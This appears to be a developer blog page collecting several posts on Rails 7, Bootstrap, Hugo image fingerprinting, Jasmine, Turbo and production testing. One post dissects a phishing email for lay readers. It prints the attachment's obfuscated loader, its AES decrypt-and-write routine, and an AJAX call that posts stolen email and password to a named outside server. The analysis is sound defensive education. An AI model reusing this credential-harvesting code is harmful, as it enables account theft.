Esnaf
Go an see the product at https://esnaftoys.com/products/nordic-fox-wooden-magnetic-toy-design
Nfox_3d_toyGo an see the product at https://esnaftoys.com/products/nordic-fox-wooden-magnetic-toy-design
Nfox_3d_toyThis article is about a UI message in our platform that was confusing enough that it prevented us from resolving a 5 days downtime on a feature. We could have resolved it much faster, but because the message was confusing it made things worse. I hope that UI experts and engineers (like us) could benefit and get an insight of how some things are confusing to the users.
Our https://www.buildin3d.com service for visualizing animated and interactive 3D assembly instructions is used by one of the well known robotics education platforms https://www.fllcasts.com. At FLLCasts there are instructions of LEGO robots and mission models from the FIRST LEGO League robotics competitions. Here is an example instruction – https://www.fllcasts.com/materials/1393-bag-12-helicopter-with-food-package-first-lego-league-2021-2022-cargo-connect
5 days ago a user wrote a ticket to us with a question:
“Why can’t I download the instructions?”.
I naturally responded to the user “Well, you can’t because this is how we’ve built them to work. They are open in the browser and they can not be downloaded. What are you trying to do anyway?” (oh, my ignorance)
The user replied in the ticket
“I just want to build them.”
Obviously there was a great miscommunication between us. The user was trying to build the instructions, but was using the term “Download”. Why? Well, because we taught them so.
5 days later I found out the following thing. Some of the instructions were not working. When users were visiting them we, as “ignorant engineers” were showing a message that said “Downloading initial steps…” while the instruction was loading. In our engineering mind we were really downloading the instruction to the browser. Some of the steps of the instruction were downloaded from the server to the client, which is the browser.
When the user got in touch with us he said “Hey, why can’t I download the instructions”.
When asked this question I assumed in the ticket that the user wanted to download the instructions on their file system and be able to open them from there in an offline mode. Which is generally what “Download” means. I made a really wrong assumption of what the user was trying to do. He was trying to load and view the instructions. He was not trying to “Download” them. But we were telling them that we are “Downloading” the instructions and they naturally used this term.
For 5 days about 5-6% of our instructions were not working correctly. We could have resolved this the right way if I paid a little more attention to what the user was asking in the ticket or if the message was “Loading initial steps…” instead of “Downloading initial steps…”
You learn something every day.
Today I put on my “new to Rails hat” and I decided to start a new Rails 7 project using the latest two new sharp knives that we have with Rails 7 to get a job done.
The Job To Be Done is: Demonstrate Bootstrap 5 examples of a Toast in a Rails 7 project.
This is a simple example of a popular Bootstrap 5 component that has both css and js involved. My goal is to build a website that will show a button and when the button is clicked a Toast will be visualised as it is in https://getbootstrap.com/docs/5.0/components/toasts/#live
These are two points of Rails doctrine. The menu is omakase, which means that we have a good default for the tools that we are using. We are also given sharp knives to use – cssbundling-rails, jsbundling-rails, Stimulus, dart-sass, esbuild.
I would like to bundle bootstrap 5 in the application. One of the options is to take bootstrap from npm and I would like to demonstrate how we bundle bootstrap from npm. Note that this might not be the right choice for you.
Make sure you have npm 7.1+. I was trying for more than an hour to identify an error because my npm version was 6.X
$ npm --version
# We pass in the option --css bootstrap that will configure most things for us
$ rails _7.0.1_ new bProject --css bootstrap
# enter the project folder
$ cd bProject
Everything is installed. You have all the dependencies to bootstrap, there is a node_modules folder containing node modules like bootstrap.
cssbundling-rails gem is installed by default in the gem file.
There is an app/assets/stylesheet/application.bootstrap.scss that imports the bootstrap css.
It’s content is:
@import 'bootstrap/scss/bootstrap';
We would be using sass (again from npm) to build this .scss file. There is a script in the package.json
{
"name": "app",
"private": "true",
"dependencies": {
"@hotwired/stimulus": "^3.0.1",
"@hotwired/turbo-rails": "^7.1.0",
"@popperjs/core": "^2.11.2",
"bootstrap": "^5.1.3",
"esbuild": "^0.14.11",
"sass": "^1.48.0"
},
"scripts": {
"build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
"build:css": "sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules"
}
}
The script build:css will take the app/assets/stylesheets/application.bootstrap.scss and will produce an app/assets/builds/application.css
The file application.css is the one that our application will be using. It is referred in application.html.erb as
<%= stylesheet_link_tag “application”, “data-turbo-track”: “reload” %>
<!DOCTYPE html>
<html>
<head>
<title>BProject</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<%= csrf_meta_tags %>
<%= csp_meta_tag %>
<%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
<%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
</head>
<body>
<%= yield %>
</body>
</html>
In order to change the css and live reload it we must start sass with –watch option as
$ sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules --watch
but don’t do this as there is a helper file that we should execute at the end of the article that is – calling ./bin/dev
jsbundling-rails is installed in the Gemfile.
There is an app/javascript/application.js that imports bootstrap
// Entry point for the build script in your package.json
import "@hotwired/turbo-rails"
import "./controllers"
import * as bootstrap from "bootstrap"
The application.js is bundled with esbuild as a tool and the command is in the package json
# part of package.json
"build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
The result is produced in app/assets/builds
The result is referred by the Rails Assets Pipeline and included in the html by calling javascript_inlcude_tag ‘application’ as in
<!DOCTYPE html>
<html>
<head>
<title>BProject</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<%= csrf_meta_tags %>
<%= csp_meta_tag %>
<%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
<%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
</head>
<body>
<%= yield %>
</body>
</html>
Initial controller that will be the home screen containing the button.
# app/controllers/home_controller.rb
$ echo '
class HomeController < ApplicationController
def index
end
end
' > app/controllers/home_controller.rb
# views folder
$ mkdir app/views/home
It contains a button and a toast.
$ echo '
<!-- app/views/home/index.html.erb -->
<h1>Title</h1>
<div data-controller="toast">
<button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
</div>
<div class="position-fixed bottom-0 end-0 p-3" style="z-index: 11">
<div id="liveToast" class="toast hide" role="alert" aria-live="assertive" aria-atomic="true">
<div class="toast-header">
<strong class="me-auto">Bootstrap</strong>
<small>11 mins ago</small>
<button type="button" class="btn-close" data-bs-dismiss="toast" aria-label="Close"></button>
</div>
<div class="toast-body">
Hello, world! This is a toast message.
</div>
</div>
</div>
' > app/views/home/index.html.erb
Note the code:
<div data-controller="toast">
<button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
</div>
Here we have a ‘data-controller’ attribute in the div element and a ‘data-action’ attribute in the button element.
This is how we will connect Stimulus JS as a javascript framework to handle the logic for clicking on this button.
When we open “/” we want Rails to call the home#index method that will return the index.html.erb page.
$ echo '
# config/routes.rb
Rails.application.routes.draw do
# Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
# Defines the root path route ("/")
root "home#index"
end' > config/routes.rb
We will use Stimulus as a small prefered framework in Rails for doing JavaScript. When the button in the above HTML fragment is selected the method show() in the controller will be called.
# Use the helper method to generate a stimulus controller
$ bin/rails generate stimulus toastController
# create the content of the controller
$ echo '
// app/javascript/controllers/toast_controller.js
import { Controller } from "@hotwired/stimulus"
import { Toast } from "bootstrap"
// Connects to data-controller="toast"
export default class extends Controller {
connect() {
}
show() {
const toastElement = document.getElementById("liveToast")
const toast = new Toast(toastElement)
toast.show();
}
}
' > app/javascript/controllers/toast_controller.js
$ ./bin/dev
There is a button that could be selected and a toast will appear.
Have you ever been on a support call with a service/vendor and they tell you – “Please, clear your browser cache!”
Or you’ve been on the development side of a website and you upload a new image on your website only for users to continue reporting that they still see the old image. Then you have to ask all of your users to refresh their browser, which is not an easy thing to do.
It’s a classic challenge with caching of assets like images and it generally has only one solution working in all cases.
Recently we had the same challenge with the new website at BeMe.ai and I thought: “Let’s explore a tool from the perspective of this challenge”. The tool is a static website generator called Hugo and the job to be done is to address the image caching challenge so that our parents of autistic children always see the latest image on our website developed by our illustrator – Antonio.
In this article I will go through what the challenge is, why there is a caching challenge, how it could be addressed without any framework, with Rails (Ruby on Rails) and with Hugo. My hope is to give you a good understanding of how the Hugo team thinks, in what terms and in what direction. This is not a Hugo tutorial, but more how I’ve focused on one challenge and tried to address it with Hugo.
When browsers visualise a webpage with images they request images from the server where the website is hosted. Images require much more bandwidth then text. Next time you visit the same website the browser will request the same image that will again require traffic. Images do not change often on websites so browsers prefer to cache the image – which means they are saved on the local storage of your device, be it mobile or desktop. Next time when you as a user open the same webpage the browser will not make a request to the server to get the same image as there is a copy of this same image already in your local storage.
The question here is how does the browser know that the image it has in its local storage is the same image as the one that is on the server. What if you’ve changed the image in the meantime and there is a new version on the server. It happened with us and an image that Antonio developed.
The answer is remarkably simple: The browser knows if the image in its local storage and the image on the server are the same if they have the same “url/name”.
Let me illustrate a scenario
A week ago:
A parent visited our website. The browser visualised the image called – parent-with-child.png
It stores a copy of parent-with-child.png in its local storage.
Two days ago:
Antonio developed a new image of the parent and the child and we uploaded it at BeMe.ai. From now on the image located on parent-with-child.png is the second version.
Today:
The same parent again visits the website. The browsers asked the server what’s on the page and the server responded that the page contains a link to parent-with-child.png. As the browser already has a local copy of the parent-with-child.png it will not request this resource from the server. It will just use the local copy. This saves the bandwidth and the site is opened faster. It’s a better experience, but it is the old image.
Which one will be shown to the user:
What really makes this problem difficult is the fact that different browsers will behave in different ways. The internet has tried many different solutions including different headers in the HTTP protocol to address this challenge. Still, there are times when the user will just not see the new version of the image. It could drive you really crazy as it will be some users seeing the new version and some seeing the old.
Technically it is not a great challenge, yet I’ve seen experienced engineers miss this small detail. I’ve missed it a couple of times. Every such case is a load on the support channel of your organisation and on the engineering. So better avoid any caching issues at all.
There are many solutions. There is only one that works across all browsers and devices and across all versions of the HTTP protocol that power the internet.
The solution is remarkably simple:
The browser will look at the URL of the image. If there is a local copy stored for this URL, the browser will use the local copy. If there is no local copy for the URL the browser will request the new image.
Everything we have to do is next time we change the parent-with-child.png image to upload the image with a new file name. Probably parent-with-child-v2.png is a good new name.
Other good names include:
All it takes to resolve the browser caching challenge is to change the name of the picture when you upload it and to change it to something unique.
That’s all it takes – no need for frameworks and fingerprinting and assets precompilation and all the other things that follow in the article.
All it takes to address and successfully resolve any browser image caching issue is to change the name of the image next time you upload a new version of it.
I think it does not work because we are humans and we forget. We create a new version of the parent-with-child.png image and we forget to change the name of the image. That’s it. We just forget.
Computers on the other hand are good at reminding us of things and of doing dull work that we often forget to do. What we could ask the computer to do is to create a new name for the image everytime we upload a new version. Enter fingerprinting?
Fingerprinting is the process of looking at the bits of the image (or generally any file) and calculating a checksum. The checksum will be unique for every file. After we calculate the checksum we add the checksum to the name of the file.
Example:
How checksums are calculated is a topic for another article. Computers are good and fast at calculating checksum. Humans are terrible. Like literally it will probably take us days of manual calculations to come up with the checksum of an image file if we do it by hand.
The difficult part is not the fingerprinting part. What’s difficult is finding every HTML page on your website where the image
parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png is used and replacing this name with parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png.
This means every occurance of on the website
<img src="https://www.beme.ai/images/parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"></img>
should be updated to contain the new url
<img src="https://www.beme.ai/images/parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png"></img>
The good thing is that computers are also good at this – searching through the content of many files and replacing specific parts of this file with new content.
What we need from our process of deploying new versions of images to our website is the following:
Linux provides simple tools as sha256sum, grep, sed, mv and in a combination with such tools we can come up with a pretty decent solution. I am not going to do that because we might decide it is a good idea to do it in this way. This might take us on a path where we are reinventing the wheel with different bash scripts all over the infrastructure and code, and there is no need to do this. If you are already on this path I can not stop you, but I don’t want to be the one guiding you on this path. Been there, done that and after many years I realised that it was not a very wise decision.
I am a big fan of Rails. Rails address the browser image caching challenge with something called “Assets Pipeline”
When we do in rails is to use the image_tag method in all HTML pages. The syntax below is an ERB template where we use “<% %>” inside the HTML when processing it on the server side.
<div class="container">
<!-- Logo -->
<%= link_to image_tag("logo.png", alt: "BeMe.ai", class: "img-fluid", width:55), main_app.root_path,{ class: "navbar-brand" }%>
<!-- End Logo -->
Note that here we use the name of “logo.png” and the image_tag method handles everything for us
<div class="container">
<a class="navbar-brand" href="/"><img alt="BeMe.ai" class="img-fluid" width="55" src="/assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png"></a>
Note how the file that we referred as logo.png in the template now becomes /assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png in the file visualised on the client.
Rails has done everything to us – fingerprinting and replacing. Thanks to the Assets Pipeline in Rails we’ve successfully resolved the browser image caching challenge.
Hugo is different from Rails. Hugo is a static website generator and it thinks in terms different from Rails. Yet, it has a Hugo Pipeline. Before we enter into the Hugo Pipeline it is good to have a small introduction to Hugo.
Hugo is thinking about the authors. It gives a chance to include team members to develop the content of the website and it does not have to be team members that know how to start & deploy Rails applications. Which is good.
This means that authors could create a markdown document like this
# Basic misconceptions about autism
In this blog post we will talk about basic misconceptions about autism.
Let's start with this picture of an autistic child and a parent

...
As a markdown document this is something that someone with medical knowledge could develop the content and there is no need to have someone with medical and HTML/Rails/Web Development expertise (and such people are difficult to find)
Now the author has added a new version of the parent-and-child.png image and it again has the name parent-and-child.png. We should somehow ask Hugo to add a fingerprint and replace all the references to the image with a reference to the new image.
In Hugo the content developers write the content in Markdown format. The engineer creates the HTML layouts. Hugo takes the layout and adds the content to the layout to generate the HTML page that should be visualised to the user. Everytime a Markdown element is converted to an HTML, Hugo calls a Markdown hook. The job of the hook is to convert the Markdown to an HTML. The logic of the hook is implemented with the Go Template Language. There are default implementations of hooks for every markdown element. We can override the default implementation of the hook that converts the Markdown containing the image parent-and-child.png to an HTML, by creating a file layouts/_default/_markup/render-image.html
Fingerprinting of content images is not enabled by default. We should be explicit that we want it. Hugo Pipeline handles the rest with methods like “fingerprint”
Here is the content of layouts/_default/_markup/render-image.html
<!-- layouts/_default/_markup/render-image.html -->
{{/* Gets a resource object from the destination of the image that is parent-with-child.png */}}
{{/* The parent-with-child.png image is specified in the markdown and must be available in the */}}
{{/* asset folder */}}
{{ $image := resources.GetMatch .Destination }}
{{/* Calculate the fingerprint, add it to the name and get the Permalink is the full URL of the file */}}
{{ $image := ($image | fingerprint).Permalink }}
<img src="{{ $image }}"/>
When processed Hugo will generate an index.html file that contains:
<img src="http://example.org/parent-and-child.a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"
Image fingerprinting is guaranteed to resolve the browser caching challenge 100% of the cases.
It is a topic that is often overlooked, both by content developers and engineers.
Without it we often end up with users seeing the wrong images and having the “Clear their browser cache and refresh again.”
It is easy to address it with many different available tools.
We’ve looked at how to implemented it with
– Linux
– Rails
– Hugo
Asking users to “clear browser cache” and “refresh a website” is a failure of the process and the engineering organisation. It should not happen, and I am sure we could be better than this.
I tried to do a quick summary in our team about what is coming from the Epic vs Apple case. After looking at a few different resources I think the following webinar gives a good understand of what is happening
Are you curious about what is inside those phishing emails and how they try to steal your password?
This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.
A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.
Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.
This is the email. It has an attachment. Looks kind of real.
This is how the attachment looks like:
What could you do:
This file is executable on Microsoft Windows machines. Lets see the content of this file if you open it with a text editor:
A sample of it is:
<script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>
This file contains an HTML document. HTML is the format of webpages and once you click on this file it will open your web browser and the web browser will execute this file.
Note: Don’t click on such attachments.
This unescape here means that the string
“‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.
‘unescape’ is a function that changes the encoding. It is technical, but at the end the goal is to make sure this file could be read by all browsers.
The result of unescaping the content looks like:
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
<script>
function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
var obj_json = JSON.parse(encrypted_json_string);
var encrypted = obj_json.ciphertext;
var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
var iv = CryptoJS.enc.Hex.parse(obj_json.iv);
var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
return decrypted.toString(CryptoJS.enc.Utf8);
}
document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE
Here is what happens in the code in simple terms:
There is an encrypted text called “ciphertext” and this cipher text is decrypted and execute. This happens on the last line of the fragment above.
So the phishing main contains an attachment, this attachment is ‘escaped’ and the ‘escaped’ content is encrypted.
The cipher text contains a web page that you browser will visualize. It looks like a real web page. It looks like a real Microsoft 365 page.
Here is a screenshot:
Here where you see “pesho@gmail.com” you will see your personal email.
This makes the page look more real to you.
The summary for now – the phishing email contains an attachment, that has an executable HTML code that is escaped, that is also encrypted, and the encrypted content contains an HTML page that looks like Microsoft login page.
There is a fragment of the code of the page that looks like this:
count=count+1
$.ajax({
dataType: 'JSON',
url: 'https://sintracoopmn.com.br/process.php',
type: 'POST',
data:{
email:email,
password:password,
detail:detail,
},
This code will send you email and password to the following webaddress https://sintracoopmn.com.br/process.php
Let’s try it.
I add the username pesho@gmail.com with password ‘abcd1234’
Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but will also log me in my Office 365 account.
So I will not even understand that I was compromised.
Add a two factor authentication.
That’s the easiest, most secure solution. Add a two factor authentication that will send you an SMS every time you login or will require you to use an authenticator app.
If you haven’t done it already, I would advice you to do it now.
We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4
There is an error that started occurring randomly and before digging down and investigating it and and the end finding out that it is probably a result of a wrong version, we decided to try to get up to date with jasmine.
Latest jasmine version is 3.X, but 2.9.1 is a huge step from 2.3.4
We will try to migrate to 2.9.1 first. The issue is that the moment we migrated there is an error
'beforeEach' should only be used in 'describe' function
It took a couple of minutes, but what we found out is that fixtures are used in different ways.
Here is the difference and what should be done.
fixture.set could be in the beforeEach and in the describe
// This works
// fixture.set is in the describe
describe("feature 1", function() {
fixture.set(`<div id="the-div"></div>`);
beforeEach(function() {
})
})
// This works
// fixture.set is in the beforeEach
describe("feature 1", function() {
beforeEach(function() {
fixture.set(`<div id="the-div"></div>`);
})
})
fixture.set could be only in the describe and not in the before beforeEach
// This does not work as the fixture is in the beforeEach
describe("feature 1", function() {
beforeEach(function() {
fixture.set(`<div id="the-div"></div>`);
})
})
// This does work
// fixture.set could be only in the describe
describe("feature 1", function() {
fixture.set(`<div id="the-div"></div>`);
beforeEach(function() {
})
})
In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.
We have a feature on one of our platforms:
The question is how do you test this?
When it comes to specs I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious to what the spec is as long as it gives me confidence and it is not standing in my way by being too fragile.
Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.
A spec that would give me confidence here is to simulate the user behavior with Rails system specs.
The user goes and click on the Export and I check that we’ve received an email and this email contains a link
scenario "create an export, uploads it on s3 and send an email" do
# Set up the record
user = FactoryBot.create(:user)
record = FactoryBot.create(:record)
...
# Start the spec
login_as user
visit "/records"
click_on "Export"
expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
csv_content = read_csv_in_zip_given_my_link link_to_exported_zip
expect(csv_content).not_to be_nil
expect(csv_content).to include user.username
end
This spec does not work!
We have a lot of other specs that are using S3 API. It is a good practice as you don’t want all your specs to touch S3 for real. It is slow and it is too coupled. But for this spec there was a problem. There was a file uploaded on S3, but the file was empty. The reason was that on one of the machines that was running the spes there was no ‘zip’ command. It was not installed and we are using ‘zip’ to create a zip of the csv files.
Because of this I wanted to upload an actual file somehow and actually check what is in the file.
I created a spec filter that would start a specific spec with real S3.
# spec/rails_helper.rb
RSpec.configure do |config|
config.before(:each) do
# Stub S3 for all specs
Aws.config[:s3] = {
stub_responses: true
}
end
config.before(:each, s3_stub_responses: false) do
# but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
Aws.config[:s3] = {
stub_responses: false
}
end
end
`This allows us to start the spec
scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
# No in this spec S3 is not stubbed and we upload the file
end
Yes, we could create a local s3 server, but then the second problem comes.
In the email we are sending a presigned_url to the S3 file as the file is not public.
But the mailer that we were using was adding “utm_campaign=…” to the url params.
This means that the S3 presigned url was not valid. Checking if there is an url in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.
This was still not enough.
All the tests were passing with real S3 and real mailer in test and development env, but when I went on production the feature was not working.
The problem was with the configuration. In order to upload to S3 we should know the bucket. The bucket was configured for Test and Development but was missing for production
config/environments/development.rb: config.aws_bucket = 'the-bucket'
config/environments/test.rb: config.aws_bucket = 'the-bucket'
config/environments/production.rb: # there was no config.aws_bucket
The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly is to run the spec on a real production.
Of course not. But there should be a few specs for a few features that should test that the buckets have the right permissions and they are accessible and the configuration in production is right. This is what I’ve added. Once a day a spec goes on the production and tests that everything works on production with real S3, real db, real env and configuration, the same way that users will use the feature.
It is not. We do not run this spec before deploy. We run all the other specs before deploy that gives us 99% confidence that everything works. But for the one percent we run a spec once every day (or after deploy) just to check a real, complex scenario, involving the communication between different systems.
It pays off.
We recently decided to migrate one of our newest platforms to Turbo. The goal of this article is to help anyone who plans to do the same migration. I hope it gives you a perspective of the amount of work required. Generally it was easy and straightforward, but a few specs had to be changed because of urls and controller results
Remove turbolinks and add turbo-rails. The change was
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -227,9 +227,8 @@ GEM
switch_user (1.5.4)
thor (1.1.0)
tilt (2.0.10)
- turbolinks (5.2.1)
- turbolinks-source (~> 5.2)
- turbolinks-source (5.2.0)
+ turbo-rails (0.7.8)
+ rails (>= 6.0.0)
Added “@notwired/turbo-rails” and removed Rails.start() and Turbolinks.start()
--- a/app/javascript/packs/application.js
+++ b/app/javascript/packs/application.js
@@ -3,8 +3,7 @@
// a relevant structure within app/javascript and only use these pack files to reference
// that code so it'll be compiled.
-import Rails from "@rails/ujs"
-import Turbolinks from "turbolinks"
+import "@hotwired/turbo-rails"
import * as ActiveStorage from "@rails/activestorage"
import "channels"
@@ -14,8 +13,6 @@ import "channels"
// Collapse - needed for navbar
import { Collapse } from 'bootstrap';
-Rails.start()
-Turbolinks.start()
ActiveStorage.start()
The change was small
--- a/package.json
+++ b/package.json
@@ -2,10 +2,10 @@
"name": "platform",
"private": true,
"dependencies": {
+ "@hotwired/turbo-rails": "^7.0.0-rc.3",
"@popperjs/core": "^2.9.2",
"@rails/actioncable": "^6.0.0",
"@rails/activestorage": "^6.0.0",
- "@rails/ujs": "^6.0.0",
"@rails/webpacker": "5.4.0",
"bootstrap": "^5.0.2",
"stimulus": "^2.0.0",
For the device forms you have to add “data: {turbo: ‘false’}” to disable turbo for them
+<%= form_for(resource, as: resource_name, url: password_path(resource_name), html: { method: :post }, data: {turbo: "false"}) do |f| %>;
We are waiting for resolutions on https://github.com/heartcombo/devise/pull/5340
If there are active_record.errors in the controller we must now return status: :unprocessable_entity
+++ b/app/controllers/records_controller.rb
@@ -14,7 +14,7 @@ class RecordsController < ApplicationController
if @record.save
redirect_to edit_record_path(@record)
else
- render :new
+ render :new, status: :unprocessable_entity
end
end
The old application.js – 923 KiB
application (932 KiB)
js/application-dce2ae8c3797246e3c4b.js
The new application.js – 248 KiB
remote: Assets:
remote: js/application-b52f4ecd1b3d48f2f393.js (248 KiB)
Overall a good experience. We are still facing some minor issues with third party chat widgets like tawk.to that do not work well with turbo, as they are sending 1 more request, refreshing the page and adding the widget to an iframe that is lost with turbo navigation. But we would probably move away from tawk.to.
Reply
You must be logged in to post a comment.